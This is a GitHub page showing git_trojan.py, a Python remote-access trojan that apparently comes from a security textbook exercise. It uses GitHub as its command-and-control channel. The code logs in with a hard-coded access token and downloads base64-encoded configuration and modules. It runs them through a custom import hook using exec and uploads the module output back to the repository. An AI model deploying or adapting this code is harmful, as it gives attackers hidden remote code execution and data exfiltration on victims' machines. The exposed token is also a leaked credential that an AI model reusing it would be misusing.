chapter7/git_trojan.py at master · jsjliyang/chapter7 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
import json
import base64
import sys
import time
import imp
import random
import threading
import queue as Queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "config/{}.json".format(trojan_id)
data_path = "data/{}/".format(trojan_id)
trojan_modules = []
configured = False
task_queue = Queue.Queue()


def connect_to_github():
    gh = login(username="jsjliyang", token="4f70a20555f3683be730ee378bd698f1f4009759")
    print(gh)
    repo = gh.repository("jsjliyang", "chapter7")
    print(repo)
    branch = repo.branch("master")
    return gh, repo, branch


def get_file_contents(filepath):
    gh, repo, branch = connect_to_github()
    tree = branch.commit.commit.tree.to_tree().recurse()
    for filename in tree.tree:
        if filepath in filename.path:
            print(filepath)
            print ("[*] Found file {}".format(filepath))
            blob = repo.blob(filename._json_data['sha'])
            return blob.content
    return None


def get_trojan_config():
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.loads(base64.b64decode(config_json))
    configured = True
    for task in config:
        print(task)
        if task['module'] not in sys.modules:
            exec("import {}".format(task['module']))
    return config


def store_module_result(data):
    gh, repo, branch = connect_to_github()
    remote_path = "data/{}/{}.data".format(trojan_id, random.randint(1000, 100000))
    # repo.create_file(remote_path, "Commit message", base64.b64encode(data.encode()))
    repo.create_file(remote_path, "Commit message",data.encode())


def module_runner(module):
    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()
    store_module_result(result)


class GitImporter(object):
    def __init__(self):
        self.current_module_code = ""

    def find_module(self, fullname, path=None):
        if configured:
            print ("[*] Attempting to retrieve {}".format(fullname))
            new_library = get_file_contents("modules/%s" % fullname)

            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self
        return None

    def load_module(self, name):
        module = imp.new_module(name)
        exec (self.current_module_code, module.__dict__)
        sys.modules[name] = module
        return module


sys.meta_path = [GitImporter()]


while True:
    if task_queue.empty():
        config = get_trojan_config()
        print(config)
        for task in config:
            t = threading.Thread(target=module_runner, args=(task['module'],))
            t.start()
            time.sleep(random.randint(1, 10))

    time.sleep(random.randint(1000, 100000))